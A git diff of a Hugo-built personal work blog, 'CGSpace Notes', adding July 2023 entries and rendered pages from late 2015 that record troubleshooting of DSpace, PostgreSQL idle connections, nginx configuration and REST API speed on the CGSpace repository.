diff --git a/content/posts/2023-07.md b/content/posts/2023-07.md
index 20257a3e9..9814fd779 100644
--- a/content/posts/2023-07.md
+++ b/content/posts/2023-07.md
@@ -10,4 +10,22 @@ categories: ["Notes"]
 - Export CGSpace to check for missing Initiative collection mappings
 - Start harvesting on AReS
 
+## 2023-07-02
+
+- Minor edits to the `crossref_doi_lookup.py` script while running some checks from 22,000 CGSpace DOIs
+
+## 2023-07-03
+
+- I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect
+  - I took the more accurate ones from Crossref and updated the items on CGSpace
+  - I took a few hundred ISBNs as well for where we were missing them
+  - I also tagged ~4,700 items with missing licenses as "Copyrighted; all rights reserved" based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer
+  - Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it's usually copyrighted (could still be open access, but we can't tell via Crossref)
+  - I would be curious to write a script to check the Unpaywall API for open access status...
+  - In the past I found that their *license* status was not very accurate, but the open access status might be more reliable
+- More minor work on the DSpace 7 item views
+  - I learned some new Angular template syntax
+  - I created a custom component to show Creative Commons licenses on the simple item page
+  - I also decided that I don't like the Impact Area icons as a component because they don't have any visual meaning
+
 <!-- vim: set sw=2 ts=2: -->
diff --git a/docs/.gitignore b/docs/.gitignore
new file mode 100644
index 000000000..e69de29bb
diff --git a/docs/2015-11/index.html b/docs/2015-11/index.html
new file mode 100644
index 000000000..5fd198598
--- /dev/null
+++ b/docs/2015-11/index.html
@@ -0,0 +1,296 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="November, 2015" />
+<meta property="og:description" content="2015-11-22
+
+CGSpace went down
+Looks like DSpace exhausted its PostgreSQL connection pool
+Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
+
+$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
+78
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2015-11/" />
+<meta property="article:published_time" content="2015-11-23T17:00:57+03:00" />
+<meta property="article:modified_time" content="2018-03-09T22:10:33+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="November, 2015"/>
+<meta name="twitter:description" content="2015-11-22
+
+CGSpace went down
+Looks like DSpace exhausted its PostgreSQL connection pool
+Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
+
+$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
+78
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "November, 2015",
+  "url": "https://alanorth.github.io/cgspace-notes/2015-11/",
+  "wordCount": "798",
+  "datePublished": "2015-11-23T17:00:57+03:00",
+  "dateModified": "2018-03-09T22:10:33+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2015-11/">
+
+    <title>November, 2015 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2015-11/">November, 2015</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2015-11-23T17:00:57+03:00">Mon Nov 23, 2015</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2015-11-22">2015-11-22</h2>
+<ul>
+<li>CGSpace went down</li>
+<li>Looks like DSpace exhausted its PostgreSQL connection pool</li>
+<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
+78
+</code></pre><ul>
+<li>For now I have increased the limit from 60 to 90, run updates, and rebooted the server</li>
+</ul>
+<h2 id="2015-11-24">2015-11-24</h2>
+<ul>
+<li>CGSpace went down again</li>
+<li>Getting emails from uptimeRobot and uptimeButler that it&rsquo;s down, and Google Webmaster Tools is sending emails that there is an increase in crawl errors</li>
+<li>Looks like there are still a bunch of idle PostgreSQL connections:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
+96
+</code></pre><ul>
+<li>For some reason the number of idle connections is very high since we upgraded to DSpace 5</li>
+</ul>
+<h2 id="2015-11-25">2015-11-25</h2>
+<ul>
+<li>Troubleshoot the DSpace 5 OAI breakage caused by nginx routing config</li>
+<li>The OAI application requests stylesheets and javascript files with the path <code>/oai/static/css</code>, which gets matched here:</li>
+</ul>
+<pre tabindex="0"><code># static assets we can load from the file system directly with nginx
+location ~ /(themes|static|aspects/ReportingSuite) {
+    try_files $uri @tomcat;
+...
+</code></pre><ul>
+<li>The document root is relative to the xmlui app, so this gets a 404—I&rsquo;m not sure why it doesn&rsquo;t pass to <code>@tomcat</code></li>
+<li>Anyways, I can&rsquo;t find any URIs with path <code>/static</code>, and the more important point is to handle all the static theme assets, so we can just remove <code>static</code> from the regex for now (who cares if we can&rsquo;t use nginx to send Etags for OAI CSS!)</li>
+<li>Also, I noticed we aren&rsquo;t setting CSP headers on the static assets, because in nginx headers are inherited in child blocks, but if you use <code>add_header</code> in a child block it doesn&rsquo;t inherit the others</li>
+<li>We simply need to add <code>include extra-security.conf;</code> to the above location block (but research and test first)</li>
+<li>We should add WOFF assets to the list of things to set expires for:</li>
+</ul>
+<pre tabindex="0"><code>location ~* \.(?:ico|css|js|gif|jpe?g|png|woff)$ {
+</code></pre><ul>
+<li>We should also add <code>aspects/Statistics</code> to the location block for static assets (minus <code>static</code> from above):</li>
+</ul>
+<pre tabindex="0"><code>location ~ /(themes|aspects/ReportingSuite|aspects/Statistics) {
+</code></pre><ul>
+<li>Need to check <code>/about</code> on CGSpace, as it&rsquo;s blank on my local test server and we might need to add something there</li>
+<li>CGSpace has been up and down all day due to PostgreSQL idle connections (current DSpace pool is 90):</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
+93
+</code></pre><ul>
+<li>I looked closer at the idle connections and saw that many have been idle for hours (current time on server is <code>2015-11-25T20:20:42+0000</code>):</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | less -S
+datid | datname  |  pid  | usesysid | usename  | application_name | client_addr | client_hostname | client_port |         backend_start         |          xact_start           |
+-------+----------+-------+----------+----------+------------------+-------------+-----------------+-------------+-------------------------------+-------------------------------+---
+20951 | cgspace  | 10966 |    18205 | cgspace  |                  | 127.0.0.1   |                 |       37731 | 2015-11-25 13:13:02.837624+00 |                               | 20
+20951 | cgspace  | 10967 |    18205 | cgspace  |                  | 127.0.0.1   |                 |       37737 | 2015-11-25 13:13:03.069421+00 |                               | 20
+...
+</code></pre><ul>
+<li>There is a relevant Jira issue about this: <a href="https://jira.duraspace.org/browse/DS-1458">https://jira.duraspace.org/browse/DS-1458</a></li>
+<li>It seems there is some sense changing DSpace&rsquo;s default <code>db.maxidle</code> from unlimited (-1) to something like 8 (Tomcat default) or 10 (Confluence default)</li>
+<li>Change <code>db.maxidle</code> from -1 to 10, reduce <code>db.maxconnections</code> from 90 to 50, and restart postgres and tomcat7</li>
+<li>Also redeploy DSpace Test with a clean sync of CGSpace and mirror these database settings there as well</li>
+<li>Also deploy the nginx fixes for the <code>try_files</code> location block as well as the expires block</li>
+</ul>
+<h2 id="2015-11-26">2015-11-26</h2>
+<ul>
+<li>CGSpace behaving much better since changing <code>db.maxidle</code> yesterday, but still two up/down notices from monitoring this morning (better than 50!)</li>
+<li>CCAFS colleagues mentioned that the REST API is very slow, 24 seconds for one item</li>
+<li>Not as bad for me, but still unsustainable if you have to get many:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+8.415
+</code></pre><ul>
+<li>Monitoring e-mailed in the evening to say CGSpace was down</li>
+<li>Idle connections in PostgreSQL again:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
+66
+</code></pre><ul>
+<li>At the time, the current DSpace pool size was 50&hellip;</li>
+<li>I reduced the pool back to the default of 30, and reduced the <code>db.maxidle</code> settings from 10 to 8</li>
+</ul>
+<h2 id="2015-11-29">2015-11-29</h2>
+<ul>
+<li>Still more alerts that CGSpace has been up and down all day</li>
+<li>Current database settings for DSpace:</li>
+</ul>
+<pre tabindex="0"><code>db.maxconnections = 30
+db.maxwait = 5000
+db.maxidle = 8
+db.statementpool = true
+</code></pre><ul>
+<li>And idle connections:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
+49
+</code></pre><ul>
+<li>Perhaps I need to start drastically increasing the connection limits—like to 300—to see if DSpace&rsquo;s thirst can ever be quenched</li>
+<li>On another note, SUNScholar&rsquo;s notes suggest adjusting some other postgres variables: <a href="http://wiki.lib.sun.ac.za/index.php/SUNScholar/Optimisations/Database">http://wiki.lib.sun.ac.za/index.php/SUNScholar/Optimisations/Database</a></li>
+<li>This might help with REST API speed (which I mentioned above and still need to do real tests)</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2015-12/index.html b/docs/2015-12/index.html
new file mode 100644
index 000000000..34206b97d
--- /dev/null
+++ b/docs/2015-12/index.html
@@ -0,0 +1,318 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="December, 2015" />
+<meta property="og:description" content="2015-12-02
+
+Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less space:
+
+# cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2015-12/" />
+<meta property="article:published_time" content="2015-12-02T13:18:00+03:00" />
+<meta property="article:modified_time" content="2018-03-09T22:10:33+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="December, 2015"/>
+<meta name="twitter:description" content="2015-12-02
+
+Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less space:
+
+# cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "December, 2015",
+  "url": "https://alanorth.github.io/cgspace-notes/2015-12/",
+  "wordCount": "753",
+  "datePublished": "2015-12-02T13:18:00+03:00",
+  "dateModified": "2018-03-09T22:10:33+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2015-12/">
+
+    <title>December, 2015 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2015-12/">December, 2015</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2015-12-02T13:18:00+03:00">Wed Dec 02, 2015</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2015-12-02">2015-12-02</h2>
+<ul>
+<li>Replace <code>lzop</code> with <code>xz</code> in log compression cron jobs on DSpace Test—it uses less space:</li>
+</ul>
+<pre tabindex="0"><code># cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+</code></pre><ul>
+<li>I had used lrzip once, but it needs more memory and is harder to use as it requires the lrztar wrapper</li>
+<li>Need to remember to go check if everything is ok in a few days and then change CGSpace</li>
+<li>CGSpace went down again (due to PostgreSQL idle connections of course)</li>
+<li>Current database settings for DSpace are <code>db.maxconnections = 30</code> and <code>db.maxidle = 8</code>, yet idle connections are exceeding this:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
+39
+</code></pre><ul>
+<li>I restarted PostgreSQL and Tomcat and it&rsquo;s back</li>
+<li>On a related note of why CGSpace is so slow, I decided to finally try the <code>pgtune</code> script to tune the postgres settings:</li>
+</ul>
+<pre tabindex="0"><code># apt-get install pgtune
+# pgtune -i /etc/postgresql/9.3/main/postgresql.conf -o postgresql.conf-pgtune
+# mv /etc/postgresql/9.3/main/postgresql.conf /etc/postgresql/9.3/main/postgresql.conf.orig 
+# mv postgresql.conf-pgtune /etc/postgresql/9.3/main/postgresql.conf
+</code></pre><ul>
+<li>It introduced the following new settings:</li>
+</ul>
+<pre tabindex="0"><code>default_statistics_target = 50
+maintenance_work_mem = 480MB
+constraint_exclusion = on
+checkpoint_completion_target = 0.9
+effective_cache_size = 5632MB
+work_mem = 48MB
+wal_buffers = 8MB
+checkpoint_segments = 16
+shared_buffers = 1920MB
+max_connections = 80
+</code></pre><ul>
+<li>Now I need to go read PostgreSQL docs about these options, and watch memory settings in munin etc</li>
+<li>For what it&rsquo;s worth, now the REST API should be faster (because of these PostgreSQL tweaks):</li>
+</ul>
+<pre tabindex="0"><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+1.474
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+2.141
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+1.685
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+1.995
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+1.786
+</code></pre><ul>
+<li>Last week it was an average of 8 seconds&hellip; now this is 1/4 of that</li>
+<li>CCAFS noticed that one of their items displays only the Atmire statlets: <a href="https://cgspace.cgiar.org/handle/10568/42445">https://cgspace.cgiar.org/handle/10568/42445</a></li>
+</ul>
+<p><img src="/cgspace-notes/2015/12/ccafs-item-no-metadata.png" alt="CCAFS item"></p>
+<ul>
+<li>The authorizations for the item are all public READ, and I don&rsquo;t see any errors in dspace.log when browsing that item</li>
+<li>I filed a ticket on Atmire&rsquo;s issue tracker</li>
+<li>I also filed a ticket on Atmire&rsquo;s issue tracker for the PostgreSQL stuff</li>
+</ul>
+<h2 id="2015-12-03">2015-12-03</h2>
+<ul>
+<li>CGSpace very slow, and monitoring emailing me to say its down, even though I can load the page (very slowly)</li>
+<li>Idle postgres connections look like this (with no change in DSpace db settings lately):</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
+29
+</code></pre><ul>
+<li>I restarted Tomcat and postgres&hellip;</li>
+<li>Atmire commented that we should raise the JVM heap size by ~500M, so it is now <code>-Xms3584m -Xmx3584m</code></li>
+<li>We weren&rsquo;t out of heap yet, but it&rsquo;s probably fair enough that the DSpace 5 upgrade (and new Atmire modules) requires more memory so it&rsquo;s ok</li>
+<li>A possible side effect is that I see that the REST API is twice as fast for the request above now:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+1.368
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.968
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+1.006
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.849
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.806
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.854
+</code></pre><h2 id="2015-12-05">2015-12-05</h2>
+<ul>
+<li>CGSpace has been up and down all day and REST API is completely unresponsive</li>
+<li>PostgreSQL idle connections are currently:</li>
+</ul>
+<pre tabindex="0"><code>postgres@linode01:~$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
+28
+</code></pre><ul>
+<li>I have reverted all the pgtune tweaks from the other day, as they didn&rsquo;t fix the stability issues, so I&rsquo;d rather not have them introducing more variables into the equation</li>
+<li>The PostgreSQL stats from Munin all point to something database-related with the DSpace 5 upgrade around mid–late November</li>
+</ul>
+<p><img src="/cgspace-notes/2015/12/postgres_bgwriter-year.png" alt="PostgreSQL bgwriter (year)">
+<img src="/cgspace-notes/2015/12/postgres_cache_cgspace-year.png" alt="PostgreSQL cache (year)">
+<img src="/cgspace-notes/2015/12/postgres_locks_cgspace-year.png" alt="PostgreSQL locks (year)">
+<img src="/cgspace-notes/2015/12/postgres_scans_cgspace-year.png" alt="PostgreSQL scans (year)"></p>
+<h2 id="2015-12-07">2015-12-07</h2>
+<ul>
+<li>Atmire sent <a href="https://github.com/ilri/DSpace/pull/161">some fixes</a> to DSpace&rsquo;s REST API code that was leaving contexts open (causing the slow performance and database issues)</li>
+<li>After deploying the fix to CGSpace the REST API is consistently faster:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.675
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.599
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.588
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.566
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.497
+</code></pre><h2 id="2015-12-08">2015-12-08</h2>
+<ul>
+<li>Switch CGSpace log compression cron jobs from using lzop to xz—the compression isn&rsquo;t as good, but it&rsquo;s much faster and causes less IO/CPU load</li>
+<li>Since we figured out (and fixed) the cause of the performance issue, I reverted Google Bot&rsquo;s crawl rate to the &ldquo;Let Google optimize&rdquo; setting</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2015/12/ccafs-item-no-metadata.png b/docs/2015/12/ccafs-item-no-metadata.png
new file mode 100644
index 000000000..552b50d12
Binary files /dev/null and b/docs/2015/12/ccafs-item-no-metadata.png differ
diff --git a/docs/2015/12/postgres_bgwriter-year.png b/docs/2015/12/postgres_bgwriter-year.png
new file mode 100644
index 000000000..918447914
Binary files /dev/null and b/docs/2015/12/postgres_bgwriter-year.png differ
diff --git a/docs/2015/12/postgres_cache_cgspace-year.png b/docs/2015/12/postgres_cache_cgspace-year.png
new file mode 100644
index 000000000..890b5132a
Binary files /dev/null and b/docs/2015/12/postgres_cache_cgspace-year.png differ
diff --git a/docs/2015/12/postgres_connections_cgspace-year.png b/docs/2015/12/postgres_connections_cgspace-year.png
new file mode 100644
index 000000000..faecf8692
Binary files /dev/null and b/docs/2015/12/postgres_connections_cgspace-year.png differ
diff --git a/docs/2015/12/postgres_locks_cgspace-year.png b/docs/2015/12/postgres_locks_cgspace-year.png
new file mode 100644
index 000000000..63624da00
Binary files /dev/null and b/docs/2015/12/postgres_locks_cgspace-year.png differ
diff --git a/docs/2015/12/postgres_scans_cgspace-year.png b/docs/2015/12/postgres_scans_cgspace-year.png
new file mode 100644
index 000000000..84e5f93be
Binary files /dev/null and b/docs/2015/12/postgres_scans_cgspace-year.png differ
diff --git a/docs/2016-01/index.html b/docs/2016-01/index.html
new file mode 100644
index 000000000..ac8a941b0
--- /dev/null
+++ b/docs/2016-01/index.html
@@ -0,0 +1,254 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="January, 2016" />
+<meta property="og:description" content="2016-01-13
+
+Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_collections.sh script I wrote last year.
+I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
+Update GitHub wiki for documentation of maintenance tasks.
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-01/" />
+<meta property="article:published_time" content="2016-01-13T13:18:00+03:00" />
+<meta property="article:modified_time" content="2018-03-09T22:10:33+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="January, 2016"/>
+<meta name="twitter:description" content="2016-01-13
+
+Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_collections.sh script I wrote last year.
+I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
+Update GitHub wiki for documentation of maintenance tasks.
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "January, 2016",
+  "url": "https://alanorth.github.io/cgspace-notes/2016-01/",
+  "wordCount": "466",
+  "datePublished": "2016-01-13T13:18:00+03:00",
+  "dateModified": "2018-03-09T22:10:33+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2016-01/">
+
+    <title>January, 2016 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
